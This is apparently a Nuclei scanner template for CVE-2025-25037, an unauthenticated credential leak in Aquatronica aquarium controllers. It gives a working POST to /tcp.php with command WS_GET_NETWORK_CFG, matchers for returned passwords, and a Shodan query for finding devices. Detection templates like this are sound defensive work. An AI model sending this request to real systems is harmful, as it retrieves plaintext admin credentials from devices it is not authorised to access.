id: CVE-2025-25037 info: name: Aquatronica Controller System <= 5.1.6 - Information Disclosure author: s4e-io severity: high description: | Aquatronica Controller System firmware 5.1.6 and earlier and web interface 2.0 and earlier contain an information disclosure vulnerability caused by unauthenticated access to tcp.php endpoint, letting remote attackers retrieve sensitive configuration data including plaintext credentials, exploit requires no authentication. impact: | Unauthenticated attackers can retrieve sensitive configuration data including plaintext credentials through the tcp.php endpoint, potentially gaining full administrative access to the controller system. remediation: | Upgrade to Aquatronica Controller System firmware version 5.1.7 or later and web interface version 2.1 or later that implements proper authentication controls. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php - https://www.exploit-db.com/exploits/52028 - https://vulncheck.com/advisories/aquatronica-controller-system-credential-leak - https://nvd.nist.gov/vuln/detail/CVE-2025-25037 classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H cve-id: CVE-2025-25037 cwe-id: CWE-200 epss-score: 0.01443 epss-percentile: 0.70497 metadata: verified: true max-request: 1 vendor: aquatronica product: controller shodan-query: html:"aquatronica" tags: cve,cve2025,aquatronica,info-leak,vkev,vuln http: - raw: - | POST /tcp.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 function_id=tcp_xml_request&command=WS_GET_NETWORK_CFG matchers-condition: and matchers: - type: word words: - "WEB_PASSWORD" - "pwd="" condition: and - type: status status: - 200 # digest: 4a0a00473045022100972b67ed4fbdc6475dc115e63dee77d16a9a22cf124896c780c714eb66ab704e0220208b9d240eb01bc57b71cc070fb4c7609faa799a30da7729424ef0f2b9d5b662:922c64590222798bb761d5b6d8e72950